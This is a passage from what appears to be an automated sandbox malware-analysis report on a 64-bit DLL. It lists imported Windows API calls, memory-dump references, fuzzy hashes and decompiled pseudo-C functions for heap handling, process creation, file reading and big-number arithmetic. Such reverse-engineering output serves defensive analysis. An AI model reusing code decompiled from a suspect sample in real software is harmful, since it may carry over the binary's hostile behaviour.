                  • HeapAlloc.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BDF
                  • wnsprintfW.SHLWAPI ref: 0000000180009C05
                    • Part of subcall function 0000000180006754: memset.NTDLL ref: 0000000180006786
                    • Part of subcall function 0000000180006754: CreateProcessW.KERNEL32 ref: 00000001800067F7
                    • Part of subcall function 0000000180006754: WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
                    • Part of subcall function 0000000180006754: TerminateProcess.KERNEL32 ref: 0000000180006844
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000684F
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000685A
                    • Part of subcall function 0000000180006754: HeapFree.KERNEL32 ref: 0000000180006877
                  • HeapFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009C26
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heaplstrlen$CloseFreeHandleProcess$AllocCreateMultipleObjectsTerminateWaitmemsetwnsprintf
                  • String ID:
                  • API String ID: 3150570956-0
                  • Opcode ID: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction ID: c1893427c912dd33d9beb41109e2d516a90994c651c2d5da5d8851701b433d67
                  • Opcode Fuzzy Hash: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction Fuzzy Hash: DD217F35710B48C6EB45CF66A85479A77A0F78CFC4F848126EE5A43B64DF38D60ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 30%
                  			E00000001180004DD0(long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long* __r8) {
                  				void* _t13;
                  				intOrPtr* _t39;
                  				intOrPtr _t41;
                  				CHAR* _t54;
                  				long long _t60;
                  				long long _t61;
                  				void* _t63;
                  				long _t69;
                  				long _t73;
                  				long long _t74;
                  				void* _t76;
                  				CHAR* _t79;
                  
                  				 *((long long*)(_t63 + 8)) = __rbx;
                  				 *((long long*)(_t63 + 0x10)) = _t60;
                  				 *((long long*)(_t63 + 0x18)) = __rsi;
                  				_t39 =  *0x8000d4a0;
                  				_t41 =  *((intOrPtr*)(_t39 + 8));
                  				_t13 = lstrlenA(_t79) + 1;
                  				r8d = _t13;
                  				HeapAlloc(_t76, _t73, _t69);
                  				_t74 = _t39;
                  				if (_t39 == __rsi) goto 0x80004eb7;
                  				HeapAlloc(??, ??, ??);
                  				_t61 = _t39;
                  				if (_t39 == __rsi) goto 0x80004ea9;
                  				E00000001180004994(_t39, _t41, __rcx);
                  				if (_t39 == __rsi) goto 0x80004e62;
                  				if ( *_t39 !=  *((intOrPtr*)(_t39 + 1))) goto 0x80004e62;
                  				_t6 = _t39 + 2; // 0x2
                  				E00000001180004994(_t39, _t41, _t6);
                  				if (_t39 == __rsi) goto 0x80004e8e;
                  				r8d = _t13 - r12d;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t41 + _t74)) = sil;
                  				lstrcpyA(_t54);
                  				goto 0x80004e9c;
                  				lstrcpyA(??, ??);
                  				 *_t61 = 0x2f;
                  				 *((intOrPtr*)(_t61 + 1)) = sil;
                  				 *__rdx = _t74;
                  				 *__r8 = _t61;
                  				goto 0x80004eb7;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}















                  0x180004dd0
                  0x180004dd5
                  0x180004dda
                  0x180004dec
                  0x180004df9
                  0x180004e0d
                  0x180004e0f
                  0x180004e14
                  0x180004e1a
                  0x180004e20
                  0x180004e2e
                  0x180004e34
                  0x180004e3a
                  0x180004e3f
                  0x180004e4a
                  0x180004e51
                  0x180004e53
                  0x180004e5a
                  0x180004e6b
                  0x180004e72
                  0x180004e77
                  0x180004e82
                  0x180004e86
                  0x180004e8c
                  0x180004e8e
                  0x180004e94
                  0x180004e98
                  0x180004e9c
                  0x180004ea4
                  0x180004ea7
                  0x180004eb1
                  0x180004ed5

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Alloclstrcpy$Freelstrlenmemcpystrchr
                  • String ID:
                  • API String ID: 2951650171-0
                  • Opcode ID: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction ID: 05cbd2bd38c1d1587f62c6617ae6625bb3c46c91ac70328d53f87b1fbcc7e3b3
                  • Opcode Fuzzy Hash: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction Fuzzy Hash: 9C21BF723047D886E782EF66B80839ABA91B38CFD4F49C420FE498B755DE38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 29%
                  			E000000011800099F4(void* __ecx, long long __rbx, void* __rcx, long long __rdx, void* __rsi, void* __rbp, intOrPtr* __r8, void* __r10, void* __r11, char _a8, long long _a16, long long _a24) {
                  				void* _v48;
                  				char _v56;
                  				char _v64;
                  				char _v72;
                  				intOrPtr _v80;
                  				long long _v88;
                  				void* __rdi;
                  				void* _t73;
                  				long long _t75;
                  				void* _t91;
                  				intOrPtr _t106;
                  				intOrPtr* _t115;
                  
                  				_t92 = __rsi;
                  				_a24 = __rbx;
                  				_a16 = __rdx;
                  				_t106 =  *((intOrPtr*)(__rcx + 0x40));
                  				_t75 = __rdx;
                  				r10d =  *(_t106 + 2) & 0x0000ffff;
                  				_t115 = __r8;
                  				if ( *0x8000d4a0 - __r10 + 8 <= 0) goto 0x80009a51;
                  				_t73 = __r10 + _t106 + 8;
                  				if (( *0x8000d498 ^ 0xecb028fc) == 0) goto 0x80009a53;
                  				E00000001180004ED8( *0x8000d498 ^ 0xecb028fc, _t73);
                  				goto 0x80009a53;
                  				if (_t73 == 0) goto 0x80009b5c;
                  				_t9 =  &_a8; // 0x52
                  				_t10 =  &_v56; // 0x12
                  				if (E000000011800094E0(__rdx, _t73, _t91, __rsi, __rbp, _t10, _t9) != 0) goto 0x80009b61;
                  				_t11 = _t73 + 2; // 0x2
                  				if (_a8 - _t11 <= 0) goto 0x80009aa8;
                  				_t15 =  &_v64; // 0xa
                  				_t16 =  &_v48; // 0x1a
                  				E000000011800081F0(_a8, _t75, _v56, _t92, _t16, _t15, __r11);
                  				goto 0x80009aad;
                  				if (0x57 != 0) goto 0x80009b36;
                  				r13d = _v64;
                  				_t19 =  &_v72; // 0x2
                  				_t20 =  &_v64; // 0xa
                  				_v80 = r13d;
                  				_v72 =  *_t115;
                  				_v88 = _v48;
                  				if (E00000001180006EB0( *_t115, _t75, _t75, _t20, _t19) != 0) goto 0x80009b16;
                  				memcpy(??, ??, ??);
                  				 *_t115 = _v72;
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b1b;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				r8d = _a8;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b61;
                  				return 2;
                  			}















                  0x1800099f4
                  0x1800099f4
                  0x1800099f9
                  0x180009a0b
                  0x180009a16
                  0x180009a19
                  0x180009a36
                  0x180009a3c
                  0x180009a3e
                  0x180009a45
                  0x180009a4a
                  0x180009a4f
                  0x180009a56
                  0x180009a5c
                  0x180009a64
                  0x180009a77
                  0x180009a7d
                  0x180009a87
                  0x180009a95
                  0x180009a9a
                  0x180009a9f
                  0x180009aa6
                  0x180009aaf
                  0x180009ab5
                  0x180009ac2
                  0x180009ac7
                  0x180009acf
                  0x180009ad4
                  0x180009ad8
                  0x180009ae6
                  0x180009afc
                  0x180009b0b
                  0x180009b0e
                  0x180009b14
                  0x180009b23
                  0x180009b30
                  0x180009b36
                  0x180009b45
                  0x180009b54
                  0x180009b5a
                  0x180009b78

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: FreeHeap$memset$memcpy
                  • String ID:
                  • API String ID: 4172471534-0
                  • Opcode ID: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction ID: 54b9a56baf89d223affce05d04c9eed0c8a26e8b2822132c81dbcb815bbc5161
                  • Opcode Fuzzy Hash: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction Fuzzy Hash: A9418E32204A8982EA92DB56E4007DBB7A1F7CDBD4F55C012FE8947759EF38C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180008034(void* __ebx, signed int __edx, void* __ebp, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long __r8, intOrPtr* __r9, void* _a8, void* _a16, long long* _a24, void* _a32) {
                  				void* _t44;
                  				void* _t52;
                  				long long _t53;
                  				signed long long _t54;
                  				intOrPtr _t67;
                  				long _t68;
                  				long long _t70;
                  				void* _t77;
                  				intOrPtr* _t83;
                  				long _t87;
                  				void* _t88;
                  				void* _t90;
                  				struct _CRITICAL_SECTION* _t92;
                  				struct _CRITICAL_SECTION* _t96;
                  
                  				_t52 = _t77;
                  				 *((long long*)(_t52 + 8)) = __rbx;
                  				 *((long long*)(_t52 + 0x10)) = __rbp;
                  				 *((long long*)(_t52 + 0x20)) = __rsi;
                  				 *((long long*)(_t52 + 0x18)) = __r8;
                  				_t53 =  *0x8000d4a0;
                  				_t88 = __rcx;
                  				EnterCriticalSection(_t96);
                  				LeaveCriticalSection(_t92);
                  				HeapAlloc(_t90, _t87, _t68);
                  				_t70 = _t53;
                  				if (_t53 == __edx) goto 0x80008129;
                  				memset(??, ??, ??);
                  				EnterCriticalSection(??);
                  				r11d =  *((intOrPtr*)(__rcx + 0xa8));
                  				_t44 =  >=  ? r11d :  *((intOrPtr*)(__rcx + 0xa8));
                  				if (_t44 == 0) goto 0x80008111;
                  				_t54 = __edx + __edx * 4;
                  				_t14 = _t88 + 0x98; // 0x98
                  				_t16 = _t54 * 8; // 0xc
                  				_t83 = _t70 + _t16 + 0xc;
                  				_t67 =  *_t14;
                  				 *((intOrPtr*)(_t83 - 0xc)) =  *((intOrPtr*)(_t67 + 0x1c));
                  				 *((long long*)(_t83 + 0x14)) =  *((intOrPtr*)(_t67 + 0x10));
                  				 *_t83 =  *((intOrPtr*)(_t67 + 0x18));
                  				 *((intOrPtr*)(_t83 + 0x28 - 0x1c)) =  *((intOrPtr*)(_t67 + 0x18));
                  				if (_t44 + 0xffffffff != 0) goto 0x800080e7;
                  				LeaveCriticalSection(??);
                  				 *__r9 = __ebp + 1;
                  				 *_a24 = _t70;
                  				goto 0x8000812e;
                  				return 8;
                  			}

















                  0x180008034
                  0x180008037
                  0x18000803b
                  0x18000803f
                  0x180008043
                  0x180008054
                  0x18000805e
                  0x18000806f
                  0x180008082
                  0x18000809a
                  0x1800080a2
                  0x1800080a8
                  0x1800080b2
                  0x1800080bc
                  0x1800080c2
                  0x1800080cd
                  0x1800080d3
                  0x1800080d5
                  0x1800080da
                  0x1800080e2
                  0x1800080e2
                  0x1800080e7
                  0x1800080ef
                  0x1800080f7
                  0x1800080fe
                  0x18000810b
                  0x18000810f
                  0x180008116
                  0x180008121
                  0x180008124
                  0x180008127
                  0x18000814c

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave$AllocHeapmemset
                  • String ID:
                  • API String ID: 3215818008-0
                  • Opcode ID: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction ID: 1a3dd1e818266afc597f0a591a41220640f3dae03b5c6049ded73bf0a5c13329
                  • Opcode Fuzzy Hash: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction Fuzzy Hash: F731A9B2A00B4896DB81CF5AE84878D77A0F748BD4F858026EF4D93360DF34CA9AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,00000001,00000001800058DA,?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000269E
                  • HeapAlloc.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026B0
                  • lstrcpyA.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026DB
                  • CloseHandle.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002724
                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000272C
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002741
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$AllocCloseErrorFreeHandleLastlstrcpylstrlen
                  • String ID:
                  • API String ID: 2779700050-0
                  • Opcode ID: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
                  • Instruction ID: 8ed8152a395896e124fdee7dd42a1db6533dceb9cab86c829ebc78b2e775e80d
                  • Opcode Fuzzy Hash: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
                  • Instruction Fuzzy Hash: 8221AD36604788C6E7A6DF52B84039AB7A0B78CBE0F48C425FE9A47764CF38D649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 39%
                  			E00000001180003698(void* __eflags, long long __rbx, void* __rcx, long long __rdx, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, short _a32) {
                  				void* _v32;
                  				short _v38;
                  				short _v40;
                  				long long _v48;
                  				signed short _v54;
                  				signed short _v56;
                  				void* __rsi;
                  				void* _t20;
                  				void* _t24;
                  				short _t30;
                  				signed short _t32;
                  				long long _t44;
                  				long _t56;
                  				long _t59;
                  				void* _t60;
                  				long long _t63;
                  				void* _t65;
                  				void* _t75;
                  				void* _t76;
                  
                  				_t45 = __rbx;
                  				_t75 = _t65;
                  				 *((long long*)(_t75 + 8)) = __rbx;
                  				 *((long long*)(_t75 + 0x10)) = __rbp;
                  				_t44 =  *0x8000d4a0;
                  				_t60 = __r8;
                  				_t63 = __rdx;
                  				_t20 = E00000001180001000(__rbx, _t75 - 0x20, __rdx, _t75 + 0x20);
                  				r12d = 0;
                  				if (_t20 != r12d) goto 0x8000376a;
                  				_t30 = _a32;
                  				_v38 = _t30;
                  				_v40 = _t30;
                  				_t32 = _t30 + 1 + _t30 + 1;
                  				_v54 = _t32;
                  				r8d = _t32 & 0x0000ffff;
                  				HeapAlloc(_t76, _t56, _t59);
                  				_v48 = _t44;
                  				if (_t44 == _t76) goto 0x8000375a;
                  				r8d = 0;
                  				_v56 = r12w;
                  				if (RtlOemStringToUnicodeString(??, ??, ??) - r12d >= 0) goto 0x80003731;
                  				RtlNtStatusToDosError(??);
                  				goto 0x80003748;
                  				_t24 = E00000001180005A0C((_v56 & 0x0000ffff) >> 1, _t45, _v48, _t60, _t63, _t63, _t60);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				return _t24;
                  			}






















                  0x180003698
                  0x180003698
                  0x18000369b
                  0x18000369f
                  0x1800036ab
                  0x1800036b2
                  0x1800036b5
                  0x1800036c4
                  0x1800036c9
                  0x1800036d1
                  0x1800036d7
                  0x1800036dd
                  0x1800036e2
                  0x1800036ea
                  0x1800036ed
                  0x1800036f2
                  0x1800036f9
                  0x1800036ff
                  0x180003707
                  0x180003713
                  0x180003716
                  0x180003725
                  0x180003729
                  0x18000372f
                  0x180003743
                  0x180003754
                  0x180003764
                  0x18000377e

                  APIs
                    • Part of subcall function 0000000180001000: CreateFileW.KERNEL32 ref: 000000018000104A
                    • Part of subcall function 0000000180001000: GetFileSize.KERNEL32 ref: 000000018000105E
                    • Part of subcall function 0000000180001000: CloseHandle.KERNEL32 ref: 00000001800010D9
                    • Part of subcall function 0000000180001000: HeapFree.KERNEL32 ref: 00000001800010F0
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 00000001800036F9
                  • RtlOemStringToUnicodeString.NTDLL ref: 000000018000371C
                  • RtlNtStatusToDosError.NTDLL ref: 0000000180003729
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003754
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003764
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Free$FileString$AllocCloseCreateErrorHandleSizeStatusUnicode
                  • String ID:
                  • API String ID: 45859668-0
                  • Opcode ID: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction ID: f5e01ebc0847fc45ed597bc040b189ed2f2401146e9d5498dfbecc36209ca11f
                  • Opcode Fuzzy Hash: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction Fuzzy Hash: 6D217172218B5881E6A1DB26E44579E73A1FB8CBD4F549521FA8E83768DF38C649CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E000000011800033B4(void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r8, signed int __r9) {
                  				void* __rdi;
                  				intOrPtr _t65;
                  				intOrPtr _t87;
                  				intOrPtr _t100;
                  				intOrPtr _t101;
                  				intOrPtr _t105;
                  				signed long long _t107;
                  				void* _t112;
                  				void* _t120;
                  				signed long long _t123;
                  				signed long long _t130;
                  				intOrPtr* _t131;
                  				intOrPtr _t139;
                  				void* _t154;
                  				intOrPtr _t155;
                  				void* _t157;
                  				signed long long _t159;
                  				intOrPtr* _t160;
                  				void* _t163;
                  				void* _t165;
                  				void* _t166;
                  				intOrPtr* _t171;
                  				void* _t179;
                  				signed long long _t181;
                  				signed long long _t182;
                  				int _t185;
                  				int _t187;
                  				void* _t191;
                  
                  				 *((long long*)(_t165 + 0x18)) = __rbx;
                  				 *((long long*)(_t165 + 0x10)) = __rdx;
                  				 *((long long*)(_t165 + 8)) = __rcx;
                  				_t166 = _t165 - 0x660;
                  				_t155 =  *((intOrPtr*)(_t166 + 0x6c0));
                  				r13d = r9d;
                  				r9d =  *((intOrPtr*)(_t166 + 0x6c8));
                  				r9d = r9d - 1;
                  				_t123 = r9d - 1;
                  				if (__eflags < 0) goto 0x80003400;
                  				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x800033f1;
                  				_t105 = __r9 + 1;
                  				 *((intOrPtr*)(_t166 + 0x28)) = _t105;
                  				if (_t105 == 0) goto 0x80003641;
                  				_t13 = _t123 + 0x20; // 0x20
                  				r14d = _t13;
                  				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x8000342d;
                  				_t112 = 0 - r14d;
                  				if (_t112 >= 0) goto 0x8000342d;
                  				if (_t112 != 0) goto 0x80003422;
                  				r14d = r14d - 1;
                  				r8d = _t105;
                  				 *((intOrPtr*)(_t166 + 0x20)) = r14d;
                  				memset(_t191, _t187, _t185);
                  				_t16 = _t166 + 0x250; // 0x249
                  				r9d = r13d;
                  				r8d = r14d;
                  				_t130 = _t185 << 2;
                  				_t65 = E00000001180008AD0(_t112, _t130, _t16, __r8, _t155, _t179);
                  				_t17 = _t166 + 0x40; // 0x39
                  				r9d = _t105;
                  				 *((intOrPtr*)(_t166 + _t130 + 0x250)) = _t65;
                  				E00000001180008AD0(_t112, _t130, _t17, _t155, _t155, _t154);
                  				_t100 =  *((intOrPtr*)(_t166 + 0x40 + _t159 * 4));
                  				 *((intOrPtr*)(_t166 + 0x24)) = _t100;
                  				memset(_t163, ??);
                  				r13d = r13d - _t105;
                  				_t139 = _t105;
                  				_t181 = r13d;
                  				 *(_t166 + 0x30) = _t181;
                  				if (_t112 < 0) goto 0x800035ee;
                  				_t124 = _t181 + _t139;
                  				_t28 = _t181 * 4; // 0x249
                  				_t160 = _t166 + _t28 + 0x250;
                  				r9d = 0xffffffff;
                  				_t31 = _t124 * 4; // 0x249
                  				_t131 = _t166 + _t31 + 0x250;
                  				if (_t100 != r9d) goto 0x800034d0;
                  				_t101 =  *_t131;
                  				goto 0x800034fb;
                  				r8d = _t155 + 1;
                  				_t157 =  >  ? __r9 : (_t181 + _t139 << 0x20) + _t139 + _t181;
                  				_t44 = _t166 + 0x40; // 0x39
                  				_t171 = _t160;
                  				r10d = _t105;
                  				if (_t101 == 0) goto 0x8000357a;
                  				r12d = 0xffffffff;
                  				r9d =  *_t44;
                  				_t87 =  *_t160;
                  				r10d = r10d + r12d;
                  				_t176 = __r9 * _t163;
                  				 *_t171 = _t87;
                  				if (_t87 - r12d <= 0) goto 0x80003548;
                  				goto 0x8000354a;
                  				 *_t171 =  *_t171 - r9d;
                  				if ( *_t171 - r12d - r9d <= 0) goto 0x80003565;
                  				goto 0x80003567;
                  				if (r10d != 0) goto 0x80003517;
                  				_t107 =  *((intOrPtr*)(_t166 + 0x28));
                  				_t182 =  *(_t166 + 0x30);
                  				 *_t131 =  *_t131 - 0 + 0 + r11d;
                  				if ( *_t131 != 0) goto 0x80003595;
                  				_t47 = _t166 + 0x40; // 0x39
                  				r8d = _t107;
                  				_t120 = E000000011800049DC(_t160, _t47, _t171 + 4);
                  				if (_t120 < 0) goto 0x800035ae;
                  				_t48 = _t166 + 0x40; // 0x39
                  				r9d = _t107;
                  				 *_t131 =  *_t131 - E00000001180004D74(_t77,  *_t171, _t131, _t160, _t160, _t48);
                  				goto 0x8000357c;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x6a0)) + _t182 * 4)) = _t101 + 1;
                  				r13d = r13d - 1;
                  				 *(_t166 + 0x30) = _t182 - 1;
                  				r9d = 0xffffffff;
                  				if (_t120 >= 0) goto 0x800034c7;
                  				r14d =  *((intOrPtr*)(_t166 + 0x20));
                  				r8d =  *((intOrPtr*)(_t166 + 0x6c8));
                  				memset(??, ??, ??);
                  				_t57 = _t166 + 0x250; // 0x249
                  				r9d = _t107;
                  				r8d = r14d;
                  				E00000001180007220(_t120, _t131 - 4,  *((intOrPtr*)(_t166 + 0x6a8)), _t57, _t157, _t176, _t159);
                  				r8d = 0x40c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}































                  0x1800033b4
                  0x1800033b9
                  0x1800033be
                  0x1800033ce
                  0x1800033d5
                  0x1800033dd
                  0x1800033e0
                  0x1800033f1
                  0x1800033f4
                  0x1800033f8
                  0x1800033fe
                  0x180003400
                  0x180003404
                  0x18000340a
                  0x18000341a
                  0x18000341a
                  0x180003420
                  0x180003422
                  0x180003425
                  0x18000342b
                  0x18000342d
                  0x180003430
                  0x180003441
                  0x180003446
                  0x18000344b
                  0x180003456
                  0x180003459
                  0x18000345f
                  0x180003463
                  0x180003468
                  0x18000346d
                  0x180003473
                  0x18000347a
                  0x18000347f
                  0x180003490
                  0x180003494
                  0x180003499
                  0x18000349c
                  0x18000349f
                  0x1800034a2
                  0x1800034a7
                  0x1800034ad
                  0x1800034b1
                  0x1800034b1
                  0x1800034b9
                  0x1800034bf
                  0x1800034bf
                  0x1800034ca
                  0x1800034cc
                  0x1800034ce
                  0x1800034d3
                  0x1800034f7
                  0x1800034fd
                  0x180003505
                  0x180003508
                  0x18000350d
                  0x180003511
                  0x18000351a
                  0x180003520
                  0x180003524
                  0x180003527
                  0x18000353a
                  0x18000353f
                  0x180003546
                  0x18000354a
                  0x18000355c
                  0x180003563
                  0x18000356f
                  0x180003571
                  0x180003575
                  0x18000357a
                  0x18000357f
                  0x180003581
                  0x180003586
                  0x180003591
                  0x180003593
                  0x180003595
                  0x18000359a
                  0x1800035aa
                  0x1800035ac
                  0x1800035be
                  0x1800035c9
                  0x1800035cd
                  0x1800035d5
                  0x1800035db
                  0x1800035e1
                  0x1800035ee
                  0x1800035ff
                  0x180003604
                  0x18000360c
                  0x18000360f
                  0x180003615
                  0x180003624
                  0x18000362a
                  0x180003636
                  0x18000365b

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction ID: ec3f035d16c0e924505bfe3f3cda61bac28d8e6f0fc5c54ff73492b97cc3beba
                  • Opcode Fuzzy Hash: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction Fuzzy Hash: EE61F532704A8486E772CE27E8457DABB95F3D8BC8F448125EE4953B98DF39E605CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: memcmp$FreeHeap
                  • String ID:
                  • API String ID: 1680564963-0
                  • Opcode ID: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction ID: e13f11c4693d54ee7f56904197b6c81cc0d09359d032e1af4ae6464abc78b12e
                  • Opcode Fuzzy Hash: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction Fuzzy Hash: 4551A172B0878955EBA2CB15A4843DA77A1A7AD7C4F54C025EE8C43786EE3DC64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180001EEC(void* __edi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
                  				void* __rsi;
                  				signed int _t65;
                  				unsigned int _t66;
                  				signed int _t73;
